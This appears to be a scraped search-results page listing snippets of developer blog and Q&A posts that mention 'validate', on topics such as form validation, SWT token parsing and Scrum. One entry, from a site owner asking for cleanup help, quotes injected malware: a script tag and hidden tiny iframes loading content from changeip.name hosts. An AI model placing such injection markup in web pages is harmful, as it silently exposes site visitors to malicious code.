Search Results

Search found 2674 results on 107 pages for 'validate'.

Page 44/107 | < Previous Page | 40 41 42 43 44 45 46 47 48 49 50 51 | Next Page >

A tour of the GlassFish 3.1.2 DCOM support

- by alexismp

While we've mentioned the DCOM support in GlassFish 3.1.2 several times before, you'll probably find Byron's DCOM blog entry to be useful if you're using Windows as a deployment platform for your GlassFish cluster. Byron discusses how DCOM is used to communicate with remote Windows nodes participating in a GlassFish cluster, what Java libraries were used to wrap around DCOM, what new asadmin commands were addd (in particular validate-dcom) as well as some tips to make this all work on your specific environment. In addition to this blog post, you should considering reading the official product documentation : • Considerations for Using DCOM for Centralized Administration • Setting Up DCOM and Testing the DCOM Set Up

Read the article
Is data integrity possible without normalization?

- by shuniar

I am working on an application that requires the storage of location information such as city, state, zip code, latitude, and longitude. I would like to ensure: Location data is accurate Detroit, CA Detroit IS NOT in California Detroit, MI Detroit IS in Michigan Cities and states are spelled correctly California not Calefornia Detroit not Detriot Cities and states are named consistently Valid: CA Detroit Invalid: Cali california DET d-town The D Also, since city/zip data is not guaranteed to be static, updating this data in a normalized fashion could be difficult, whereas it could be implemented as a de facto location if it is denormalized. A couple thoughts that come to mind: A collection of reference tables that store a list of all states and the most common cities and zip codes that can grow over time. It would search the database for an exact or similar match and recommend corrections. Use some sort of service to validate the location data before it is stored in the database. Is it possible to fulfill these requirements without normalization, and if so, should I denormalize this data?

Read the article
Silverlight Security

Here are some interesting links about Silverlight security (I learnt a lot from the first document): Silverlight security whitepaper: > http://download.microsoft.com/download/A/1/A/A1A80A28-907C-4C6A-8036-782E3792A408/Silverlight Security Overview.docx This reading gives you a lot of insight into features like Isolated Storage, Local Messaging, Cross-Site Scripting (XSS), Sandbox, Validate input, https, . Shawn Wildermuths session at MIX10: > Securing Microsoft Silverlight Applications ...Did you know that DotNetSlackers also publishes .net articles written by top known .net Authors? We already have over 80 articles in several categories including Silverlight. Take a look: here.

Read the article
How should programmers handle email-username identity theft?

- by Craige

Background I recently signed up for an iTunes account, and found that somebody had fraudulently used MY email to register their iTunes account. Why Apple did not validate the email address, I will never know. Now I am told that I cannot use my email address to register a new iTunes account, as this email address is linked to an existing account. This got be thinking... Question How should we as developers handle email/identity theft? Obviously, we should verify that an email address belongs to the person it is said to belong to. Why Apple did not do this in my case, I have no idea. But lets pretend we use email address for login/account identification, and something slipped though the cracks (be it our end, or the users). How should we handle reports of fraudulent accounts?

Read the article
Client Side Form Validation vs. Server Side Form Validation

In my opinion, it is mandatory to validate data using client side and server side validation as a fail over process. The client side validation allows users to correct any error before they are sent to the web server for processing, and this allows for an immediate response back to the user regarding data that is not correct or in the proper format that is desired. In addition, this prevents unnecessary interaction between the user and the web server and will free up the server over time compared to doing only server side validation. Server validation is the last line of defense when it comes to validation because you can check to ensure the user’s data is correct before it is used in a business process or stored to a database. Honestly, I cannot foresee a scenario where I would only want to use one form of validation over another especially with the current cost of creating and maintaining data. In my opinion, the redundant validation is well worth the overhead.

Read the article
Limitations of User-Defined Customer Events (FA Type Profile)

- by Rajesh Sharma

CC&B automatically creates field activities when a specific Customer Event takes place. This depends on the way you have setup your Field Activity Type Profiles, the templates within, and associated SP Condition(s) on the template. CC&B uses the service point type, its state and referenced customer event to determine which field activity type to generate. Customer events available in the base product include: Cut for Non-payment (CNP) Disconnect Warning (DIWA) Reconnect for Payment (REPY) Reread (RERD) Stop Service (STOP) Start Service (STRT) Start/Stop (STSP) Note the Field values/codes defined for each event. CC&B comes with a flexibility to define new set of customer events. These can be defined in the Look Up - CUST_EVT_FLG. Values from the Look Up are used on the Field Activity Type Profile Template page. So what's the use of having user-defined Customer Events? And how will the system detect such events in order to create field activity(s)? Well, system can only detect such events when you reference a user-defined customer event on a Severance Event Type for an event type Create Field Activities. This way you can create additional field activities of a specific field activity type for user-defined customer events. One of our customers adopted this feature and created a user-defined customer event CNPW - Cut for Non-payment for Water Services. This event was then linked on a Field Activity Type Profile and referenced on a Severance Event - CUT FOR NON PAY-W. The associated Severance Process was configured to trigger a reconnection process if it was cancelled (done by defining a Post Cancel Algorithm). Whenever this Severance Event was executed, a specific type of Field Activity was generated for disconnection purposes. The Field Activity type was determined by the system from the Field Activity Type Profile referenced for the SP Type, SP's state and the referenced user-defined customer event. All was working well until the time when they realized that in spite of the Severance Process getting cancelled (when a payment was made); the Post Cancel Algorithm was not executed to start a Reconnection Severance Process for the purpose of generating a reconnection field activity and reconnecting the service. Basically, the Post Cancel algorithm (if specified on a Severance Process Template) is triggered when a Severance Process gets cancelled because a credit transaction has affected/relieved a Service Agreement's debt. So what exactly was happening? Now we come to actual question as to what are limitations in having user-defined customer event. System defined/base customer events are hard-coded across the entire system. There is an impact even if you remove any customer event entry from the Look Up. User-defined customer events are not recognized by the system anywhere else except in the severance process, as described above. There are few programs which have routines to first validate the completion of disconnection field activities, which were raised as a result of customer event CNP - Cut for Non-payment in order to perform other associated actions. One such program is the Post Cancel Algorithm, referenced on a Severance Process Template, generally used to reconnect services which were disconnected from other Severance Event, specifically CNP - Cut for Non-Payment. Post cancel algorithm provided by the product - SEV POST CAN does the following (below is the algorithm's description): This algorithm is called after a severance process has been cancelled (typically because the debt was paid and the SA is no longer eligible to be on the severance process). It checks to see if the process has a completed 'disconnect' event and, if so, starts a reconnect process using the Reconnect Severance Process Template defined in the parameter. Notice the underlined text. This algorithm implicitly checks for Field Activities having completed status, which were generated from Severance Events as a result of CNP - Cut for Non-payment customer event. Now if we look back to the customer's issue, we can relate that the Post Cancel algorithm was triggered, but was not able to find any 'Completed' CNP - Cut for Non-payment related field activity. And hence was not able to start a reconnection severance process. This was because a field activity was generated and completed for a customer event CNPW - Cut for Non-payment of Water Services instead. To conclude, if you introduce new customer events, you should be aware that you don't extend or simulate base customer events, the ones that are included in the base product, as they are further used to provide/validate additional business functions.

Read the article
What's Your Supply Chain+Manufacturing Strategy for Success

- by [email protected]

Forward thinking enterprises look to eliminate their dependence on legacy applications that manage information in batch - replacing them with real-time integrated/modern information managment. With rapid manufacturing and global supply chains much more complex today, with the pace of chance ever increasing, leading organizations need better ways to orchestrate their supply chain synchronization with their partner and customer base. EM magazine Mar/Apr'10 edition, covers this topic in an article "Strategising for Success" pgs 26-27, and discusses the available options to organizations as they drive improvements in the levels of collaboration with their partners, suppliers, shippers, distributors and ultimately their end-users, the customer! I'll past the link to the article here as soon as i validate/confirm it.

Read the article
SEO optimisation problems after Google Panda [on hold]

- by Daniel West

I am currently trying to improve a website's SEO after it took quite a hit from the Google Panda upgrades. What are the main things I need to look at improving when trying to improve its ranking in Google? I have already made sure that the pages validate to W3C Standards, minimized css and js and done the obvious meta tags and header optimization but this hasn't made any difference yet. It could possibly be a content issue as the pages currently read much like a brochure and there were some pages with just a video and no text content on them which is also an issue. I've added a rel="nofollow" attribute to the links to these pages although i'm told this doesn't really work anymore. If anyone has any ideas let me know. Cheers!

Read the article
Salesforce deployment guideline using Sandbox

- by ybbest

Create Deployment connection Enable the inbound change set settings on the destination Environment you would like to deploy the solution to. Enable the outbound change set settings on the source Environment where you package your application. The best practice is to Package everything in the changeset and salesforce will only deploy the change into your destination environment. If you only package the change, you could miss some of the changes. You can clone the change set on the source destination however the initial packaging takes some time as you need to go through everything and select the components manually. After the change set is packaged, you need to upload the chagneset so that destination environment can see the change set in its incoming change set list. Click Validate the change set before deployment. References: Development Lifecycle Guide Change Sets Best Practices

Read the article
How to set up a one-man research in the difference between BDD and Waterfall?

- by Martijn van der Maas

Earlier, I asked a question about how to measure the quality of a project. The outcome of that question was that the quality of the project can be divided into two parts: Internal quality (code quality, measurable by code quality metrics) External quality (Acceptance test, how well the software meets the requirements) So based on that, I want to set up some research and validate the outcome of the project. The problem is, I will conduct this research on my own, so it's not possible to run the project once in BDD style and the other one in waterfall by myself. It's also not possible to compare BDD and waterfall projects on a larger scale, due to the fact that there are not enough BDD projects that can be measured because of the age of BDD. So, my question is: did anybody face this problem? How could I execute my experiment in such a way that it is of scientific value?

Read the article
Are you ready for the needed changes to your Supply Chain for 2013?

- by Stephen Slade

With the initiation of the Dodd-Frank Act, companies need to determine if their products contain 'conflict materials' from certain global markets as the Rep of Congo. The materials include metals such as gold, tin, tungsten and tantalum. Compaines with global sourcing face new disclosure requirements in Feb'13 related to business being done in Iran. Public companies are required to disclose to U.S. security regulators if they or their affiliates are engaged in business in Iran either directly or indirectly. Is your supply chain compliant? Do you have sourcing reports to validate? Where are the materials in your chips & circuit boards coming from? In the next few weeks, responsible companies will be scrutinizing their supply chains, subs, JVs, and affiliates to search for exposure. Source: Brian Lane, Atty at Gibson Dunn Crutcher, as printed in the WSJ Tues, Dec 11, 2012 p.B8

Read the article
How to remove this malware

- by muratto12

Some files in my site contains some extra lines. After I've deleted them manually, I find them corrupted again some time later. it is all coming from http://*.changeip.name/ some js files. How can I remove them? <script type='text/javascript' src='http://m2.changeip.name/validate.js?ftpid=15035'></script> <iframe src=http://pizda.changeip.name/?f=1065433 framebor der=0 marginheight=0 marginwidth=0 scrolling=0 width=5 heigh t=5 border=0> <iframe src=http://kuku.changeip.name/?f=1065433 framebord er=0 marginheight=0 marginwidth=0 scrolling=0 width=5 height =5 border=0>

Read the article
How should programmers handle identity theft?

- by Craige

I recently signed up for an iTunes account, and found that somebody had fraudulently used MY email to register their iTunes account. Why Apple did not validate the email address, I will never know. Now I am told that I cannot use my email address to register a new iTunes account, as this email address is linked to an existing account. This got me thinking, as developers, database administrators, technical analysts, and everything in between, how should we handle reports of a fraud account? Experience teaches us never to re-assign identifying credentials. This can break things and/or cause mass confusion, especially in the realm of the web. That is, if we are are needing to reassign an identifying user credential we can very likely break a users bookmark by making a page render data that previously did not exist at that location. So if we have been taught not to re-assign details like these, how should we handle such a case where an account is discovered to be a fraud and the owner of the identity (e-mail or user name) wishes to claim this detail for their account?

Read the article
Restoring Databases

- by Grant Fritchey

I like the way Mike Walsh phrased it: You're Only As Good as Your Ability To Restore. Ain't it the truth. You may be taking backups, incrementals, and log backups of your databases. You may have DBCC in place, and all that fun stuff. But if you haven't restored the database, what do you have? You don't know. The trick is, restoring databases takes up a heck of a lot of space on your servers. To test all your productions backups, you'd need a system with as much space as production. unless.. Ever heard of SQL Virtual Restore? Check it out. With this, you answer Mike's questions and validate your backups without having to have twice the amount of space. That's a win, and we all know, winning is better than losing.

Read the article
WIF-less claim extraction from ACS: SWT

- by Elton Stoneman

WIF with SAML is solid and flexible, but unless you need the power, it can be overkill for simple claim assertion, and in the REST world WIF doesn’t have support for the latest token formats. Simple Web Token (SWT) may not be around forever, but while it's here it's a nice easy format which you can manipulate in .NET without having to go down the WIF route. Assuming you have set up a Relying Party in ACS, specifying SWT as the token format: When ACS redirects to your login page, it will POST the SWT in the first form variable. It comes through in the BinarySecurityToken element of a RequestSecurityTokenResponse XML payload , the SWT type is specified with a TokenType of http://schemas.xmlsoap.org/ws/2009/11/swt-token-profile-1.0 : <t:RequestSecurityTokenResponse xmlns:t="http://schemas.xmlsoap.org/ws/2005/02/trust"> <t:Lifetime> <wsu:Created xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">2012-08-31T07:31:18.655Z</wsu:Created> <wsu:Expires xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">2012-08-31T09:11:18.655Z</wsu:Expires> </t:Lifetime> <wsp:AppliesTo xmlns:wsp="http://schemas.xmlsoap.org/ws/2004/09/policy"> <EndpointReference xmlns="http://www.w3.org/2005/08/addressing"> <Address>http://localhost/x.y.z</Address> </EndpointReference> </wsp:AppliesTo> <t:RequestedSecurityToken> <wsse:BinarySecurityToken wsu:Id="uuid:fc8d3332-d501-4bb0-84ba-d31aa95a1a6c" ValueType="http://schemas.xmlsoap.org/ws/2009/11/swt-token-profile-1.0" EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd"> [ base64string ] </wsse:BinarySecurityToken> </t:RequestedSecurityToken> <t:TokenType>http://schemas.xmlsoap.org/ws/2009/11/swt-token-profile-1.0</t:TokenType> <t:RequestType>http://schemas.xmlsoap.org/ws/2005/02/trust/Issue</t:RequestType> <t:KeyType>http://schemas.xmlsoap.org/ws/2005/05/identity/NoProofKey</t:KeyType> </t:RequestSecurityTokenResponse> Reading the SWT is as simple as base-64 decoding, then URL-decoding the element value: var wrappedToken = XDocument.Parse(HttpContext.Current.Request.Form[1]); var binaryToken = wrappedToken.Root.Descendants("{http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd}BinarySecurityToken").First(); var tokenBytes = Convert.FromBase64String(binaryToken.Value); var token = Encoding.UTF8.GetString(tokenBytes); var tokenType = wrappedToken.Root.Descendants("{http://schemas.xmlsoap.org/ws/2005/02/trust}TokenType").First().Value; The decoded token contains the claims as key/value pairs, along with the issuer, audience (ACS realm), expiry date and an HMAC hash, which are in query string format. Separate them on the ampersand, and you can write out the claim values in your logged-in page: var decoded = HttpUtility.UrlDecode(token); foreach (var part in decoded.Split('&')) { Response.Write("<pre>" + part + "</pre><br/>"); } - which will produce something like this: http://schemas.microsoft.com/ws/2008/06/identity/claims/authenticationinstant=2012-08-31T06:57:01.855Z http://schemas.microsoft.com/ws/2008/06/identity/claims/authenticationmethod=http://schemas.microsoft.com/ws/2008/06/identity/authenticationmethod/windows http://schemas.microsoft.com/ws/2008/06/identity/claims/windowsaccountname=XYZ http://schemas.xmlsoap.org/ws/2005/05/identity/claims/[email protected] http://schemas.xmlsoap.org/ws/2005/05/identity/claims/[email protected] http://schemas.microsoft.com/accesscontrolservice/2010/07/claims/identityprovider=http://fs.svc.xyz.com/adfs/services/trust Audience=http://localhost/x.y.z ExpiresOn=1346402225 Issuer=https://x-y-z.accesscontrol.windows.net/ HMACSHA256=oDCeEDDAWEC8x+yBnTaCLnzp4L6jI0Z/xNK95PdZTts= The HMAC hash lets you validate the token to ensure it hasn’t been tampered with. You'll need the token signing key from ACS, then you can re-sign the token and compare hashes. There's a full implementation of an SWT parser and validator here: How To Request SWT Token From ACS And How To Validate It At The REST WCF Service Hosted In Windows Azure, and a cut-down claim inspector on my github code gallery: ACS Claim Inspector. Interestingly, ACS lets you have a value for your logged-in page which has no relation to the realm for authentication, so you can put this code into a generic claim inspector page, and set that to be your logged-in page for any relying party where you want to check what's being sent through. Particularly handy with ADFS, when you're modifying the claims provided, and want to quickly see the results.

Read the article
Validating User Stories: How much change is too much?

- by David Kaczynski

While the core of requirements development and acceptance criteria would ideally take place during the planning meeting in order to create a better estimate, Scrum encourages continuous interaction with the product owner throughout the sprint to validate and refine user stories. What kind of criteria is used to judge if there is too much change being imposed on a user story mid-sprint? When is it appropriate to change the requirements of the user story? When is it appropriate to cancel the user story / sprint in order to re-evaluate and re-estimate a user story in question?

Read the article
How are generics implemented?

- by greenoldman

This is the question from compiler internals perspective. I am interested in generics, not templates (C++), so I marked the question with C#. Not Java, because AFAIK the generics in both languages differ in implementations. When I look at languages w/o generics it is pretty straightforward, you can validate the class definition, add it to hierarchy and that's it. But what to do with generic class, and more importantly how handle references to it? How to make sure that static fields are singular per instantiations (i.e. each time generic parameters are resolved). Let's say I see a call: var x = new Foo<Bar>(); Do I add new Foo_Bar class to hierarchy? Update: So far I found only 2 relevant posts, however even they don't go into much details in sense "how to do it by yourself": http://www.jprl.com/Blog/archive/development/2007/Aug-31.html http://www.artima.com/intv/generics2.html

Read the article
Is hierarchical product backlog a good idea in TFS 2012-2013?

- by Matías Fidemraizer

I'd like to validate I'm not in the wrong way. My team project is using Visual Studio Scrum 2.x. Since each area/product has a lot of kind of requirements (security, user interface, HTTP/REST services...), I tried to manage this creating "parent backlogs" which are "open forever" and they contain generic requirements. Those parent backlogs have other "open forever" backlogs, and/or sprint backlogs. For example: HTTP/REST Services (forever) ___ Profiles API (forever) ________ POST profile (forever) _______________ We need a basic HTTP/REST profiles' API to register new user profiles (sprint backlog) Is it the right way of organizing the product backlog? Note: I know there're different points of view and that would be right for some and wrong for others. I'm looking for validation about if this is a possible good practice on TFS with Visual Studio Scrum.

Read the article
Authenticating users for a website

- by MCB

I'm working on a website and I want to validate that an individual is an employee at one of a large number of companies (probably using their company's email address, which I don't know before hand). The idea being some users are the general public and others are from these companies. And I need some way to authenticate that the users claiming to be employees are being honest while still having a friendly enough UI. I did an informal survey of people I know and the domains and emails will match in a majority of cases but they might not always match exactly so you might have a company with a website foo.com and an email [email protected] (although foobar.com did redirect back to foo.com). And while I can easily check that I'm not sure what other variations might be out there (maybe fooLA.com and email [email protected], etc.)

Read the article
Modeling Websites and Native Code

I've blogged previously about the Architecture tools in Visual Studio 2010. These tools offer a fantastic way to understand an existing application, design some new functionality, and validate an implementation against architectural rules and constraints. Recently, we announced the availability of the Visualization and Modeling Feature Pack for MSDN subscribers, which complements the Architecture tools in Visual Studio 2010 by adding support for: C/C++ code visualization Website visualization Improved...Did you know that DotNetSlackers also publishes .net articles written by top known .net Authors? We already have over 80 articles in several categories including Silverlight. Take a look: here.

Read the article
Modeling Websites and Native Code

I've blogged previously about the Architecture tools in Visual Studio 2010. These tools offer a fantastic way to understand an existing application, design some new functionality, and validate an implementation against architectural rules and constraints. Recently, we announced the availability of the Visualization and Modeling Feature Pack for MSDN subscribers, which complements the Architecture tools in Visual Studio 2010 by adding support for: C/C++ code visualization Website visualization Improved...Did you know that DotNetSlackers also publishes .net articles written by top known .net Authors? We already have over 80 articles in several categories including Silverlight. Take a look: here.

Read the article
Diagramming software with API allowing high customisation of shapes and actions

- by jenson-button-event

I am after something like Visio or Lucid. A relatively simple charting/diagramming tool, to build tree-like structures from (my) pre-defined nodes (squares), but with a powerful API. Requirements: limit the type of objects allowed to be dropped on the diagram validate a model (e.g. node of type A must precede node of type B; must enter node Title) export a model import a model Our domain is very specific, and its a tool we'd want to offer to some of our power users. The $500 Visio licence isn't really within the business model. I'll put no constraints on framework or deployment (web or desktop) - is there anything out there?

Read the article
Visual Studio 2010 & .NET 4.0 RC in Feb-2010

Scott says, In order to make sure that these fixes truly address the performance issues reported, and to Other Interested articles…27 New Features of .NET Framework 4.022 New Features of Visual Studio 2008 for .NET Professionals50 New Features of SQL Server 2008IIS 7.0 New featureshelp validate them across the broadest number of scenarios and machine configurations, we’ve decided to ship another public preview release of VS 2010 and .NET 4 before we ship. Specifically, we plan to make a Release Candidate build available in February that everyone will be able to download and test. It will be a public build and include a broad “go live” license that supports production deployment.The goal behind the Release Candidate is to get broad feedback on the readiness of the product. In order to ensure that we are able to receive and react to this feedback, we will also be moving the launch of Visual Studio 2010 and .NET 4 back a few weeks.Continue span.fullpost {display:none;}

Read the article
asp.net web apps: are OnServerValidate necessary with custom validators

- by peroija

I recently created a .net web app that used over 200 custom validators on one page. I wrote code for both ClientValidationFunction and OnServerValidate which results in a ton of repetitive code. My sql statements are parameterized, I have functions that pull data from input fields and validates them before passing to the sql statements or stored procedures. And the javascript validates the fields before the page submits. So essentially the data is clean and valid before it even hits the OnServerValidate and clean after it anyways due to the aforementioned steps. This makes me question, is OnServerValidate really needed when I validate on the clientside?

Read the article
Can data classes contain methods for validation?

- by Arturas M

OK, say I have a data class for a user: public class User { private String firstName; private String lastName; private long personCode; private Date birthDate; private Gender gender; private String email; private String password; Now let's say I want to validate email, whether names are not empty, whether birth date is in normal range, etc. Can I put that validation method in this class together with data? Or should it be in UserManager which in my case handles the lists of these users?

Read the article

< Previous Page | 40 41 42 43 44 45 46 47 48 49 50 51 | Next Page >